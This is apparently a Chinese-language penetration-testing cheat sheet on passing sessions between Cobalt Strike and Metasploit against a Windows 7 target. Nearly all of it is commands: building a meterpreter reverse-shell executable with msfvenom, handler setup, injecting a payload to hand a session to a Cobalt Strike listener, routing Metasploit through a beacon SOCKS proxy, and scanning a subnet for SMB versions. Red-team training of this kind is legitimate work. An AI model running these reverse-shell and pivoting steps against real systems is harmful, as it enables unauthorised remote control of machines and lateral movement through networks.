CS联动MSF

- CS：监听器端口`8080`
- MSF：监听端口`9999`靶机：Win7，

$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=<MSF_IP> lport=<MSF_Port> -f exe > msf.exe

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp 
msf6 exploit(multi/handler) > set lhost <MSF_IP>
msf6 exploit(multi/handler) > set lport <MSF_Port>
msf6 exploit(multi/handler) > exploit 

- 监听器类型：`windows/beacon_http/reverse_http`
- Host修改为CS的IP，监听指定端口，等待MSF发送

# 挂起会话
meterpreter> background

# 使用payload_inject模块,执行之后会在本地产生一个新的Handler
msf> use exploit/windows/local/payload_inject

# 根据CS监听器类型选择对应的payload（http或者https）
msf> set payload windows/meterpreter/reverse_http

# 设置回连地址,CS_IP和监听器端口
msf> set LHOST <CS_IP>
msf> set LPORT <CS_Port>   # 前面CS监听器端口

# 指定要执行的Session
msf> set session <Session_ID>

# 设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立
msf> set disablepayloadhandler true 
msf> run

# 配置监听器
msf> use exploit/multi/handler

# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用64位
msf> set lhost <MSF_IP>
msf> set lport <MSF_Port>   # 设置任意端口进行监听

# 启动监听器
msf> run

- IP设置为MSF的外网IP
- 端口设置为MSF监听端口

beacon> Spawn msf

beacon> socks <Proxy_Prot>   # 设置任意端口进行代理

setg Proxies socks4:<CS_IP>:<Proxy_Prot>

# MSF所有流量将走此代理
msf> setg Proxies socks4:<CS_IP>:<Proxy_Prot>

# 设置允许反向代理，即建立双向通道
# 如果通过此socks反弹shell，则需要开启，否则不推荐开启
msf> setg ReverseAllowProxy true

# 可以使用以下命令停止
msf> unsetg Proxies

msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 192.168.100.0/24   # 靶机如果有其它网段也可以扫描
msf> set threads 10
msf> run